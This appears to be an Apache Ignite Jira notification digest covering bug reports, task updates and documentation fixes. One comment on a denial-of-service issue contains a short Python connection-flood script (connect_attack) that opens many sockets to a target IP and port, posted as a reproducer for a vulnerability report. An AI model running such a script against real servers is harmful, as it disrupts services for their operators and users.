[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Labels: ducktests thin  (was: )

> Timeout while thin client connection
> 
>
> Key: IGNITE-16843
> URL: https://issues.apache.org/jira/browse/IGNITE-16843
> Project: Ignite
>  Issue Type: Bug
>Reporter: Sergey Korotkov
>Priority: Minor
>  Labels: ducktests, thin
> Attachments: test_one_greedy_thin_client.png
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> In usecases with several active thin clients producing noticable load to 
> cluster new thin clients can fail to connect with the 
> *"ClientConnectionException: Channel is closed"* error in the 
> *TcpClientChannel::handshake()* method.
> On server side warning *"Unable to perform handshake within timeout 
> [timeout=1"* is logged.
> The problem can be easily reproduced by several large putAlls invoked in 
> parallel from several or single thin client.  Espesially for the 
> TRANSACTIONAL caches.  But ATOMIC caches are also affected - the only 
> difference is that for ATOMIC caches more parallelizm factor and larger 
> batches for putAlls are needed.
> 
> The reason of the problem is a fact that a single queue is used in the ignite 
> node to serve all thin client related requests (queue in the 
> {_}GridThinClientExecutor{_}). Both working requests like _putAll_ and 
> control ones like _handshake_ which are used for connection establishment. 
> Working requests can live indefenitely in a queue (or at least longer then 
> {_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
> the ignite node to check if a _handshake_ request is processed in a timely 
> manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By 
> default the 10 seconds timeout is used 
> ({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires 
> the client session is closed forcibly.
> So, if one or several thin clients fill queue with long operations new 
> clients can not connect. 
> 
> The real usecase reveals the problem is as follows.
>  * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
>  * One TRANSACTIONAL cache with backups=1
>  * About 30Gb of data on each node
>  * Several (upto 75 at the same time) thin clients loading data using putAlls 
> in 5 records batches. Client connects, loads 3 batches and disconnects 
> (spark jobs in fact). In other words clients connect and disconnect 
> constantly.
>  * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
> ClientConnectorConfiguration
> 
> Two ducktests were created to reproduce and isolate  the problem (see the 
> {*}ignitetest/tests/thin_client_concurrency{*} in the attached pull request).
> *{color:#ff}Note that asserts in testcases done in a way that test PASS 
> means that problem IS reproduced.{color}*  Tests check that at least one thin 
> client fails with the "Channel is closed" error and that server node log 
> contains warning about the handshake timeout.
> *ThinClientConcurrencyTest::test_many_thin_clients*
> Mimics the above real life usecase. Several thin client processes invoke 
> putAlls in several threads. There are two sets of parameters - one for 
> TRANSACTIONAL and one for ATOMIC cache.
> *ThinClientConcurrencyTest::test_one_greedy_thin_client*
> Minimal test shows that a single thin client can produce such a load that 
> another one can not connect.
> On the attached metrics screenshot the behaviour of the test is shown in 
> details:
> 1. The first thin client invoked and started data load with putAlls in 
> several threads
> 2. The second thin client is invoked once the queue is filled
> 3. After 10 seconds the session of the second client is closed
> 4. Executor takes the handshake request from queue and (erroneously?) 
> increases the _client_connector_AcceptedSessions_ metric (note that 
> _ActiveSessions _ wasn't increased).
> [^test_one_greedy_thin_client.png]
>  
> 
> The following full stack trace is logged on the client side:
> {noformat}
> org.apache.ignite.client.ClientConnectionException: Channel is closed
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
>  ~[classes/:?]
> at 
> 

[jira] [Commented] (IGNITE-16741) DoS attacks on ignite ports

2022-04-13 Thread biandeqiang (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16741?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17522016#comment-17522016
 ] 

biandeqiang commented on IGNITE-16741:
--

import sys

import socket

import time

s = []

def main():

    try:

        if sys.argv[1]:

            ip = sys.argv[1]

        if sys.argv[2]:

            port = int(sys.argv[2])

        connect_attack(ip,port)    

    except IndexError:

        print("Please add two parameters as IP and port")     

def connect_attack(ip,port):

    for i in range(8):

        s.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))

        s[i].connect((ip, port))

        if (i % 500 == 0):

            print(i)

            # time.sleep(1)

if __name__ == "__main__":

    main()   

> DoS attacks on ignite ports
> ---
>
> Key: IGNITE-16741
> URL: https://issues.apache.org/jira/browse/IGNITE-16741
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.11.1
>Reporter: biandeqiang
>Assignee: Aleksandr Polovtcev
>Priority: Critical
>  Labels: ise
>
> DoS attacks on ignite's TcpCommunicationSpi and TcpDiscoverySpi's ports
> The ignite I use is embedded,ignite uses two ports, When I was testing a dos 
> attack on the port, ignite had java.lang.OutOfMemoryError: Direct buffer 
> memory.
> TcpDiscoverySpi spi = new TcpDiscoverySpi();
> spi.setLocalPort("port")
> TcpCommunicationSpi ipCom = new TcpCommunicationSpi();
> ipCom.setLocalPort("port")
>  
> {{[2021-12-01 14:12:59,056][WARN 
> ][0][0][grid-nio-worker-tcp-comm-4-#43%TcpCommunicationSpi%][ROOT][IgniteLoggerImp][88]
>  Caught unhandled exception in NIO worker thread (restart the node). 
> java.lang.OutOfMemoryError: Direct buffer memory
> at java.nio.Bits.reserveMemory(Bits.java:695)
> at java.nio.DirectByteBuffer.(DirectByteBuffer.java:123)
> at java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:311)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.register(GridNioServer.java:2672)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.bodyInternal(GridNioServer.java:2089)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.body(GridNioServer.java:1910)
> at org.apache.ignite.internal.util.worker.GridWorker.run(GridWorker.java:120)
> at java.lang.Thread.run(Thread.java:748)}}
>  
> I hope Ignite can also add MaxConnect as Tomcat and set a counter. If the 
> counter exceeds the value, wait for several seconds.{{{}{}}}



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16840) Error creating bean SqlViewMetricExporterSpi while setting bean property 'metricExporterSpi' according documentation

2022-04-13 Thread YuJue Li (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16840?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521978#comment-17521978
 ] 

YuJue Li commented on IGNITE-16840:
---

[~igor_zadubinin] The document has been fixed, it is recommended to close this 
issue.

> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation
> 
>
> Key: IGNITE-16840
> URL: https://issues.apache.org/jira/browse/IGNITE-16840
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.12
>Reporter: Igor Zadubinin
>Assignee: Igor Zadubinin
>Priority: Major
>
> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation 
> [https://ignite.apache.org/docs/latest/monitoring-metrics/new-metrics-system]
>  
> Error creating bean with name 'ignite.cfg' defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml]:
>  Cannot create inner bean 
> 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' of type 
> [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] while setting 
> bean property 'metricExporterSpi' with key [0]; nested exception is 
> org.springframework.beans.factory.CannotLoadBeanClassException: Cannot find 
> class [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] for bean 
> with name 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' 
> defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml];
>  nested exception is java.lang.ClassNotFoundException: 
> org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li updated IGNITE-15712:
--
Ignite Flags:   (was: Docs Required,Release Notes Required)

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Since SqlViewMetricExporterSpi is moved to internal package and is enabled by 
> default (see IGNITE-12922), documentation should be updated.
> However, currently it contains wrong recipies about how to configure 
> SqlMetricsExporter



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Resolved] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li resolved IGNITE-15712.
---
Resolution: Fixed

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Since SqlViewMetricExporterSpi is moved to internal package and is enabled by 
> default (see IGNITE-12922), documentation should be updated.
> However, currently it contains wrong recipies about how to configure 
> SqlMetricsExporter



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11650) Commutication worker doesn't kick client node after expired idleConnTimeout

2022-04-13 Thread Amelchev Nikita (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11650?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Amelchev Nikita reassigned IGNITE-11650:


Assignee: Amelchev Nikita

> Commutication worker doesn't kick client node after expired idleConnTimeout
> ---
>
> Key: IGNITE-11650
> URL: https://issues.apache.org/jira/browse/IGNITE-11650
> Project: Ignite
>  Issue Type: Bug
>Reporter: Anton Kalashnikov
>Assignee: Amelchev Nikita
>Priority: Major
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Reproduced by TcpCommunicationSpiFreezingClientTest.testFreezingClient
> {noformat}
> java.lang.AssertionError: Client node must be kicked from topology
>   at org.junit.Assert.fail(Assert.java:88)
>   at 
> org.apache.ignite.testframework.junits.JUnitAssertAware.fail(JUnitAssertAware.java:49)
>   at 
> org.apache.ignite.spi.communication.tcp.TcpCommunicationSpiFreezingClientTest.testFreezingClient(TcpCommunicationSpiFreezingClientTest.java:122)
>   at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
>   at 
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>   at 
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>   at java.lang.reflect.Method.invoke(Method.java:498)
>   at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)
>   at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
>   at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)
>   at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>   at 
> org.junit.internal.runners.statements.RunBefores.evaluate(RunBefores.java:26)
>   at 
> org.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:27)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2102)
> {noformat}



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16823) .NET: Thin 3.0: Compute cluster awareness

2022-04-13 Thread Igor Sapego (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16823?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521791#comment-17521791
 ] 

Igor Sapego commented on IGNITE-16823:
--

[~ptupitsyn] looks good to me

> .NET: Thin 3.0: Compute cluster awareness
> -
>
> Key: IGNITE-16823
> URL: https://issues.apache.org/jira/browse/IGNITE-16823
> Project: Ignite
>  Issue Type: Improvement
>  Components: platforms, thin client
>Affects Versions: 3.0.0-alpha5
>Reporter: Pavel Tupitsyn
>Assignee: Pavel Tupitsyn
>Priority: Major
>  Labels: ignite-3
> Fix For: 3.0.0-alpha5
>
>
> Currently, all Compute operations go through the default node. Improve client 
> compute with cluster awareness:
> * Correspond client connections with node id (extend handshake)
> * *Compute.Execute*: match specified set of nodes against active connections. 
> If there are matches, pick random. Otherwise, use default connection and let 
> the server handle node mapping.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-16848) [Versioned Storage] Provide common interface for abstract internal tuples

2022-04-13 Thread Ivan Bessonov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16848?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ivan Bessonov reassigned IGNITE-16848:
--

Assignee: Ivan Bessonov

> [Versioned Storage] Provide common interface for abstract internal tuples
> -
>
> Key: IGNITE-16848
> URL: https://issues.apache.org/jira/browse/IGNITE-16848
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Ivan Bessonov
>Assignee: Ivan Bessonov
>Priority: Major
>  Labels: iep-74, ignite-3
> Fix For: 3.0.0-alpha5
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> Methods from class "Row" should be extracted to provide generic tuple API to 
> components like SQL indexes or MV storage.
> Tuple is NOT schema-aware and should NOW have methods like "Object value(int 
> col)", because it's represents basic blob with little to no meta information



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16848) [Versioned Storage] Provide common interface for abstract internal tuples

2022-04-13 Thread Ivan Bessonov (Jira)
Ivan Bessonov created IGNITE-16848:
--

 Summary: [Versioned Storage] Provide common interface for abstract 
internal tuples
 Key: IGNITE-16848
 URL: https://issues.apache.org/jira/browse/IGNITE-16848
 Project: Ignite
  Issue Type: Improvement
Reporter: Ivan Bessonov
 Fix For: 3.0.0-alpha5


Methods from class "Row" should be extracted to provide generic tuple API to 
components like SQL indexes or MV storage.

Tuple is NOT schema-aware and should NOW have methods like "Object value(int 
col)", because it's represents basic blob with little to no meta information



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16611) [Versioned Storage] Version chain data structure for RocksDB-based storage

2022-04-13 Thread Ivan Bessonov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16611?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ivan Bessonov updated IGNITE-16611:
---
Labels: iep-74 ignite-3  (was: ignite-3)

> [Versioned Storage]  Version chain data structure for RocksDB-based storage
> ---
>
> Key: IGNITE-16611
> URL: https://issues.apache.org/jira/browse/IGNITE-16611
> Project: Ignite
>  Issue Type: Task
>  Components: persistence
>Reporter: Sergey Chugunov
>Assignee: Ivan Bessonov
>Priority: Major
>  Labels: iep-74, ignite-3
>
> To support Concurrency Control and implement effective transactions 
> capability to store multiple values of the same key is needed in existing 
> storage.
> h3. Version chain
> Key component here is a special data structure called version chain: it is a 
> list of all versions of a particular key, with the most recent version at the 
> beginning (HEAD).
> Each entry in the chain contains value, reference to the next entry in the 
> list, begin and end timestamps and id of active transaction that created this 
> version.
> There are at least two approaches to implement this structure on top of 
> RocksDB:
> * Combine original key and version into a new key which is put into a RocksDB 
> tree. In that case to restore version chain we need to iterate over the tree 
> using original key as a prefix.
> * Use original key as-is but make it pointing not to the value directly but 
> to an array containing version and other metainformation (ts, id etc) and 
> keys in some secondary tree.
> h3. New API to manage versions
> The following new API should be implemented to provide access to version 
> chain:
> * Methods to manipulate versions: add new version to the chain, commit 
> uncommited version, abort uncommited version.
> * Method to cleanup old versions from the chain.
> * Method to scan over keys up to provided timestamp.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16847) [Extensions] Use apache-release profile for extension release

2022-04-13 Thread Maxim Muzafarov (Jira)
Maxim Muzafarov created IGNITE-16847:


 Summary: [Extensions] Use apache-release profile for extension 
release
 Key: IGNITE-16847
 URL: https://issues.apache.org/jira/browse/IGNITE-16847
 Project: Ignite
  Issue Type: Task
  Components: extensions
Reporter: Maxim Muzafarov
Assignee: Maxim Muzafarov
 Fix For: 2.14


The goal is to prepare everything for an extension release:
- sources 
- binary pagackes (if applicable)
- pgp sign
- checksums

In addition some scripts are required to follow up the ASF release process.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16847) [Extensions] Use apache-release profile for extension release

2022-04-13 Thread Maxim Muzafarov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16847?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Maxim Muzafarov updated IGNITE-16847:
-
Ignite Flags:   (was: Docs Required,Release Notes Required)

> [Extensions] Use apache-release profile for extension release
> -
>
> Key: IGNITE-16847
> URL: https://issues.apache.org/jira/browse/IGNITE-16847
> Project: Ignite
>  Issue Type: Task
>  Components: extensions
>Reporter: Maxim Muzafarov
>Assignee: Maxim Muzafarov
>Priority: Major
> Fix For: 2.14
>
>
> The goal is to prepare everything for an extension release:
> - sources 
> - binary pagackes (if applicable)
> - pgp sign
> - checksums
> In addition some scripts are required to follow up the ASF release process.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16815) [Extensions] Ignite extensions must use ignite-parent as a parent project

2022-04-13 Thread Maxim Muzafarov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16815?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Maxim Muzafarov updated IGNITE-16815:
-
Ignite Flags:   (was: Docs Required,Release Notes Required)

> [Extensions] Ignite extensions must use ignite-parent as a parent project
> -
>
> Key: IGNITE-16815
> URL: https://issues.apache.org/jira/browse/IGNITE-16815
> Project: Ignite
>  Issue Type: Improvement
>  Components: extensions
>Reporter: Maxim Muzafarov
>Assignee: Maxim Muzafarov
>Priority: Major
> Fix For: 2.14
>
>
> Ignite Extensions currently use their own maven parent project which is lead 
> for duplicated configuration of maven profiles, dependency versions and the 
> build lifecycle. Since the ignite-parent pom is now available it's better to 
> use shared pom as single parent for all extensions.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 75 at the same time) thin clients loading data using putAlls 
in 5 records batches. Client connects, loads 3 batches and disconnects 
(spark jobs in fact). In other words clients connect and disconnect constantly.
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem (see the 
{*}ignitetest/tests/thin_client_concurrency{*} in the attached pull request).

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 

[jira] [Assigned] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li reassigned IGNITE-15712:
-

Assignee: YuJue Li

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>
> Since SqlViewMetricExporterSpi is moved to internal package and is enabled by 
> default (see IGNITE-12922), documentation should be updated.
> However, currently it contains wrong recipies about how to configure 
> SqlMetricsExporter



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16846) Internal API modules cleanup

2022-04-13 Thread Sergey Chugunov (Jira)
Sergey Chugunov created IGNITE-16846:


 Summary: Internal API modules cleanup
 Key: IGNITE-16846
 URL: https://issues.apache.org/jira/browse/IGNITE-16846
 Project: Ignite
  Issue Type: Task
  Components: networking
Reporter: Sergey Chugunov


Two modules containing internal APIs need refactoring and cleanup.
 * *network-api* module contains classes and interfaces placed in public 
packages (without *internal* package in their full paths) that shouldn't be 
exposed to the end-user;
 * *configration-api* module contains mix of classes, interfaces and 
annotations some of them are clearly internal and some of them are used in 
ignite-api module which is definitely public.

We should address it in the following way:
 * in *network-api* module it is enough to rename packages and add *internal* 
package to the full path;
 * in *configuration-api* we need to move code around: as we don't have 
embedded mode of server nodes user won't interact with Java configuration 
directly. Thus configuration schema classes can be moved from *ignite-api* 
module to modules where this configuration classes belong to. After that we 
could add *internal* package to full path of all classes in *configuration-api* 
module as well.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 75 at the same time) thin clients loading data using putAlls 
in 5 records batches. Client connects, loads 3 batches and disconnects 
(spark jobs in fact). In other words clients connect and disconnect constantly.
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem 
({*}ignitetest/tests/thin_client_concurrency{*}).

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 

[jira] [Created] (IGNITE-16845) RocksSnapshotManager#snapshotIterator() leaks ReadOptions

2022-04-13 Thread Roman Puchkovskiy (Jira)
Roman Puchkovskiy created IGNITE-16845:
--

 Summary: RocksSnapshotManager#snapshotIterator() leaks ReadOptions
 Key: IGNITE-16845
 URL: https://issues.apache.org/jira/browse/IGNITE-16845
